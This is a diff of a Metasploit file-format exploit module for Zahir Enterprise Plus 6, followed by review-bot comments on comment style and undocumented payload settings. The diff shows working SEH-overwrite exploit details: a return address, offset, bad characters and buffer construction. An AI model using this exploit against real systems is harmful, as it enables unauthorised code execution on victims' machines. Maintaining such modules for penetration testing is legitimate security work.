diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
index 4c9590d60b..65a722a1e5 100644
--- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
+++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'Author' =>
 [
- 'f3ci', # found the vulnerability
+ 'f3ci', # found the vulnerability
 'modpr0be' # Metasploit Module
 ],
 'References' =>
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
 [
 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
 {
- 'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+ #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+ 'Ret' => 0x52016661,
 'Offset' => 3041
 }
 ]
@@ -42,7 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
 'Payload' =>
 {
 'Space' => 5000,
- 'BadChars' => "\x00\x0a\x0d\x22\x2c"
+ 'BadChars' => "\x00\x0a\x0d\x22\x2c",
+ 'DisableNops' => true,
+ 'StackAdjustment' => -3500
 },
 'Privileged' => false,
 'DisclosureDate' => 'Sep 28 2018',
@@ -57,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def exploit
 buf = rand_text_alpha_upper(target['Offset'])
- buf << "\n\r" # crash chars
+ buf << "\r\n" # crash chars
 buf << rand_text_alpha_upper(380) # extra chars to hit the offset
 buf << generate_seh_record(target.ret)
 buf << make_nops(12)
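Review bot: The comment moved onto its own line in the target options (`#P/P/R from vclie100.bpl ...`) lost the space after `#`, while the other comments visible in this diff keep it (`# found the vulnerability`, `# crash chars`). Write it as `# P/P/R from vclie100.bpl (...)` so the comment style stays uniform and a leading-comment-space lint check does not flag the new line.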
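Review bot: `'DisableNops' => true` and `'StackAdjustment' => -3500` are added to the `'Payload'` hash without any comment, so a maintainer cannot tell where the -3500 figure comes from or how it relates to the existing `'Space' => 5000`. Unlike the first two hunks this one changes behaviour rather than formatting, so it deserves a one-line comment above the new keys, for example `# <why NOPs are disabled; how -3500 was chosen; build it was tested on>`, with the placeholders filled in by the author.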
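Review bot: The byte order in `buf << "\r\n" # crash chars` is swapped, but the trailing comment is unchanged, so nothing in the hunk records why the order matters. Extend the comment, for example `# crash chars: CR/LF order required because <observed reason>`, filling in what was seen with the old `"\n\r"` order. Both bytes also appear in `'BadChars'`, so a word that their use here is deliberate would keep a later reader from treating it as an oversight. The body of `exploit` continues outside the hunk.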